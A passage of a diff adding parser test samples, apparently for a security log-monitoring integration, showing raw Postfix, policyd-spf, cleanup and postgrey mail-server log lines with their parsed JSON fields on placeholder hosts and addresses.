[ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "outcome_reason": "success", + "target": "network-traffic" + }, + "destination": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 10025 + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== "wo_appname_policydspf1.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: Permerror (mailfrom) identity=mailfrom; client-ip=1.1.1.1; helo=corp.com; envelope-from=ops@corp.com; receiver= Reject action: 550 5.7.23 210", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "ops@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "corp.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "corp.com", + "domain": "corp.com", + "ip": "1.1.1.1", + "registered_domain": "corp.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf10.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: Pass (sender SPF authorized) identity=helo; client-ip=1.2.3.4; helo=example.outbound.protection.outlook.com; envelope-from=<>; receiver= Reject action: 550 5.7.23", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.outbound.protection.outlook.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.outbound.protection.outlook.com", + "domain": 
"example.outbound.protection.outlook.com", + "ip": "1.2.3.4", + "registered_domain": "outlook.com", + "subdomain": "example.outbound.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf11.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: Softfail (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=noreply@example.com; receiver= Reject action: 550 5.7.23", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "outcome_reason": "SPF validation failed", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "noreply@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1.2.3.4" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "wo_appname_policydspf12.json" + + ```json + + { + "message": "Neutral; identity=mailfrom; client-ip=1.2.3.4; helo=example.mail.protection.outlook.com; envelope-from=john.doem@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Neutral", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "john.doem@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.mail.protection.outlook.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.mail.protection.outlook.com", + "domain": "example.mail.protection.outlook.com", + "ip": "1.2.3.4", + "registered_domain": "outlook.com", + "subdomain": "example.mail.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf13.json" + + ```json + + { + "message": "None; identity=helo; client-ip=1.2.3.4; helo=[1.2.3.4]; 
envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1.2.3.4" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "wo_appname_policydspf14.json" + + ```json + + { + "message": "Pass; identity=helo; client-ip=1.2.3.4; helo=mail.example.org; envelope-from=<>; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Pass", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mail.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mail.example.org", + "domain": "mail.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mail", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf15.json" + + ```json + + { + "message": "Pass; identity=mailfrom; client-ip=1.2.3.4; helo=example.outbound.protection.outlook.com; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Pass", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.outbound.protection.outlook.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.outbound.protection.outlook.com", + "domain": "example.outbound.protection.outlook.com", + "ip": "1.2.3.4", + "registered_domain": "outlook.com", + "subdomain": "example.outbound.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== 
"wo_appname_policydspf16.json" + + ```json + + { + "message": "Permerror; identity=helo; client-ip=1.2.3.4; helo=example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Permerror", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf17.json" + + ```json + + { + "message": "Permerror; identity=mailfrom; client-ip=1.2.3.4; helo=example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Permerror", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf18.json" + + ```json + + { + "message": "Permerror; identity=mailfrom; client-ip=1.2.3.4; helo=example.org; envelope-from=no-reply@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Permerror", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "no-reply@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ 
+ "example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf19.json" + + ```json + + { + "message": "Softfail; identity=mailfrom; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=noreply@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Softfail", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "noreply@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1.2.3.4" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "wo_appname_policydspf2.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=mx.example.com; envelope-from=prvs=30447fe13=no-reply@example.com; receiver= Reject action: 550 5.7.23", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "outcome_reason": "SPF validation failed", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "prvs=30447fe13=no-reply@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mx.example.com", + "domain": "mx.example.com", + "ip": "1.2.3.4", + "registered_domain": "example.com", + "subdomain": "mx", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf20.json" + + ```json + + { + "message": "prepend Received-SPF: Fail (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; 
envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf21.json" + + ```json + + { + "message": "prepend Received-SPF: Neutral (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "prepend Received-SPF", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf22.json" + + ```json + + { + "message": "prepend Received-SPF: None (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1.2.3.4" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "wo_appname_policydspf23.json" + + ```json + + { + "message": "prepend 
Received-SPF: None (no SPF record) identity=helo; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "prepend Received-SPF", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf24.json" + + ```json + + { + "message": "prepend Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf25.json" + + ```json + + { + "message": "prepend Received-SPF: Pass (sender SPF authorized) identity=helo; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "prepend Received-SPF", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + 
"hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf26.json" + + ```json + + { + "message": "prepend Received-SPF: Permerror (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf27.json" + + ```json + + { + "message": "prepend Received-SPF: Softfail (domain owner discourages use of this host) identity=helo; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "prepend Received-SPF", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf28.json" + + ```json + + { + "message": "prepend Received-SPF: Softfail (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; 
envelope-from=jdoe@example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf3.json" + + ```json + + { + "message": "Action: prepend Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=11.22.33.44; helo=mta-11-22-33-44.example.or; envelope-from=doe@newsletter.example.org; receiver=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "doe@newsletter.example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mta-11-22-33-44.example.or" + ], + "ip": [ + "11.22.33.44" + ] + }, + "source": { + "address": "mta-11-22-33-44.example.or", + "domain": "mta-11-22-33-44.example.or", + "ip": "11.22.33.44", + "subdomain": "mta-11-22-33-44.example" + } + } + + ``` + + +=== "wo_appname_policydspf4.json" + + ```json + + { + "message": "Pass; identity=mailfrom; client-ip=1.1.1.1; helo=mail.corp.com; envelope-from=username@corp.com; receiver= 131", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Pass", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "username@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mail.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "mail.corp.com", + "domain": "mail.corp.com", + "ip": "1.1.1.1", + "registered_domain": "corp.com", + "subdomain": "mail", + "top_level_domain": "com" + } + 
} + + ``` + + +=== "wo_appname_policydspf5.json" + + ```json + + { + "message": "None; identity=helo; client-ip=1.1.1.1; helo=sub.corp.com; envelope-from=noreply@corp.com; receiver= 128", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "noreply@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "sub.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "sub.corp.com", + "domain": "sub.corp.com", + "ip": "1.1.1.1", + "registered_domain": "corp.com", + "subdomain": "sub", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf6.json" + + ```json + + { + "message": "Softfail; identity=mailfrom; client-ip=1.1.1.1; helo=corp.com; envelope-from=username@corp.com; receiver= 120", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "Softfail", + "outcome": "success", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "username@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "corp.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "corp.com", + "domain": "corp.com", + "ip": "1.1.1.1", + "registered_domain": "corp.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_policydspf7.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: None (mailfrom) identity=mailfrom; client-ip=2.3.4.5; helo=[1.2.3.4]; envelope-from=jdoe@example.org; receiver= Reject action: 550 5.7.23", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "outcome_reason": "SPF validation failed", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + 
"hosts": [ + "1.2.3.4" + ], + "ip": [ + "2.3.4.5" + ] + }, + "source": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "ip": "2.3.4.5" + } + } + + ``` + + +=== "wo_appname_policydspf8.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: None (no SPF record) identity=helo; client-ip=2.3.4.5; helo=posta.example.org; envelope-from=<>; receiver= Reject action: 550 5.7.23", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "posta.example.org" + ], + "ip": [ + "2.3.4.5" + ] + }, + "source": { + "address": "posta.example.org", + "domain": "posta.example.org", + "ip": "2.3.4.5", + "registered_domain": "example.org", + "subdomain": "posta", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_policydspf9.json" + + ```json + + { + "message": "Action: prepend: Text: Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=example.outbound.protection.outlook.com; envelope-from=jdoe@example.org; receiver= Reject action: 550 5.7.23", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "reject", + "outcome": "success", + "outcome_reason": "SPF validation failed", + "target": "network-traffic" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.outbound.protection.outlook.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "example.outbound.protection.outlook.com", + "domain": "example.outbound.protection.outlook.com", + "ip": "1.2.3.4", + "registered_domain": "outlook.com", + "subdomain": "example.outbound.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_postfix1.json" + + ```json + + { + "message": 
"7B082110A6E0: host smtp.office365.com[40.101.136.242] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=EXAMPLE.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=EXAMPLE.PROD.OUTLOOK.COM] (in reply to end of DATA command)", + "type": [ + "info" + ] + }, + "action": { + "outcome": "success", + "outcome_reason": "The recipient`s Exchange Server incoming mail queue has been stopped", + "target": "network-traffic", + "type": "end of DATA" + }, + "destination": { + "address": "40.101.136.242", + "domain": "smtp.office365.com", + "ip": "40.101.136.242" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "EXAMPLE.PROD.OUTLOOK.COM", + "smtp.office365.com" + ], + "ip": [ + "40.101.136.242" + ] + }, + "source": { + "address": "EXAMPLE.PROD.OUTLOOK.COM", + "domain": "EXAMPLE.PROD.OUTLOOK.COM", + "registered_domain": "OUTLOOK.COM", + "subdomain": "EXAMPLE.PROD", + "top_level_domain": "COM" + } + } + + ``` + + +=== "wo_appname_postfix2.json" + + ```json + + { + "message": "01B3A96050: Used TLS for 10.19.65.1[10.19.65.1]:587", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "10.19.65.1", + "domain": "10.19.65.1", + "ip": "10.19.65.1", + "port": 587 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "10.19.65.1" + ], + "ip": [ + "10.19.65.1" + ] + } + } + + ``` + + +=== "wo_appname_postfix3.json" + + ```json + + { + "message": "023069605C: Used TLS for smtp.example.org[163.172.55.8]:25", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "163.172.55.8", + "domain": "smtp.example.org", + "ip": "163.172.55.8", + "port": 25 + }, + "network": { + 
"protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "163.172.55.8" + ] + } + } + + ``` + + +=== "wo_appname_postfix4.json" + + ```json + + { + "message": "NOQUEUE: client=unknown[10.100.0.3]", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "10.100.0.3", + "ip": "10.100.0.3" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "ip": [ + "10.100.0.3" + ] + } + } + + ``` + + +=== "wo_appname_postfix5.json" + + ```json + + { + "message": "warning: read TCP map reply from 127.0.0.1:10030: unexpected EOF (Operation now in progress)", + "event": { + "category": [ + "email" + ], + "reason": "unexpected EOF (Operation now in progress)", + "type": [ + "info" + ] + }, + "destination": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "port": 10030 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== "wo_appname_postfix6.json" + + ```json + + { + "message": "0A90996059: to=, relay=localhost[127.0.0.1]:10025, conn_use=3, delay=5.2, delays=0/0/0/5.2, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 0BF0C9605C)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "mail2sms.smsbox.net", + "domain": "mail2sms.smsbox.net", + "ip": "127.0.0.1", + "port": 10025, + "registered_domain": "smsbox.net", + "subdomain": "mail2sms", + "top_level_domain": "net" + }, + "email": { + "to": { + "address": [ + "sms@mail2sms.smsbox.net" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mail2sms.smsbox.net" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== "wo_appname_postfix7.json" + + ```json + + { + "message": "proxy-accept: END-OF-MESSAGE: 250 2.0.0 Ok: queued as 7949396087; from= to= proto=ESMTP helo=", + "event": 
{ + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "accept", + "outcome": "success", + "target": "network-traffic", + "type": "END-OF-MESSAGE" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org", + "mx.example.org" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postfix8.json" + + ```json + + { + "message": "D2D459605C: Used TLS for smtp-in.example.com[5.6.7.8]:25", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "5.6.7.8", + "domain": "smtp-in.example.com", + "ip": "5.6.7.8", + "port": 25 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "smtp-in.example.com" + ], + "ip": [ + "5.6.7.8" + ] + } + } + + ``` + + +=== "wo_appname_postfix_cleanup1.json" + + ```json + + { + "message": "581B85F5B3: warning: header Content-Disposition: inline; filename=\"\"image018.png\"\"; size=162328;??creation-date=\"\"Thu, 11 Apr 2024 07:53:08 GMT\"\";??modification-date=\"\"Thu, 11 Apr 2024 07:53:08 GMT\"\" from local; from= to=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "file": { + "name": "image018.png", + "size": 162328 + }, + "network": { + "protocol": "smtp" + }, 
+ "related": { + "hosts": [ + "example.com", + "example.org" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postfix_cleanup2.json" + + ```json + + { + "message": "59B835F5AD: warning: header Content-Disposition: attachment;??filename=\"\"=?utf-8?B?111111111111111111111111111111111111111111111111111111111111?=? =?utf-8?B?222222222222222222222222222222222222222222222222222222222222?=? =?utf-8? from local; from= to=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "example.org" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postfix_cleanup3.json" + + ```json + + { + "message": "EBA403F815: message-id=<74c99d8a-eb8b-4045-ae8e-6d3f6d51b41d@example.org>", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "74c99d8a-eb8b-4045-ae8e-6d3f6d51b41d@example.org" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_postfix_no_spam_cleanup1.json" + + ```json + + { + "message": "000FA5FD8F: prepend: header 
From: John Doe from localhost[127.0.0.1]; from= to= proto=ESMTP helo=: X-NMFP-TRUST: TRUE", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "smtp.example.org" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "127.0.0.1", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postfix_no_spam_cleanup2.json" + + ```json + + { + "message": "008BB5FD76: prepend: header 
From: =?UTF-8?q?Cellier_du_P=C3=A9rigord?=?? from localhost[127.0.0.1]; from= to= proto=ESMTP helo=: X-NMFP-TRUST: FALSE", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "from": { + "address": [ + "newsletter@wine.com" + ] + }, + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org", + "smtp.example.org" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "127.0.0.1", + "registered_domain": "example.org", + "subdomain": "smtp", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey1.json" + + ```json + + { + "message": "action=greylist, reason=early-retry (10s missing), client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com", + "event": { + "category": [ + "email" + ], + 